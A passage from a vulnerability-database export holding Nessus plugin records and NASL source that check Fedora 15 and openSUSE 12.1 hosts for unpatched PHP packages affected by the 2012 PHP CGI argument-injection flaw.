or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"maniadrive-1.2-32.fc15.5\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-5.3.13-1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-eaccelerator-0.9.6.1-9.fc15.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:24:54", "description": "when used in CGI mode remote attackers could inject command line\narguments to php", "edition": 22, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : php5 
(openSUSE-SU-2012:0590-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-fileinfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", 
"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", 
"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "OPENSUSE-2012-261.NASL", "href": "https://www.tenable.com/plugins/nessus/74616", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-261.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74616);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-SU-2012:0590-1)\");\n script_summary(english:\"Check for the openSUSE-2012-261 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote 
openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"when used in CGI mode remote attackers could inject command line\narguments to php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-05/msg00006.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-mod_php5-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-mod_php5-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bcmath-5.3.8-4.15.2\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.1\", reference:\"php5-bcmath-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bz2-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bz2-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-calendar-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-calendar-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ctype-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ctype-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-curl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-curl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dba-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dba-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-debugsource-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-devel-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dom-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dom-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-enchant-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-enchant-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-exif-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-exif-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fastcgi-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 
reference:\"php5-fastcgi-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fileinfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fileinfo-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fpm-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fpm-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ftp-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ftp-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gd-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gd-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gettext-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gettext-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gmp-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gmp-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-iconv-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-iconv-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-imap-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-imap-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-intl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-intl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-json-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-json-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ldap-5.3.8-4.15.2\") ) flag++;\nif ( 
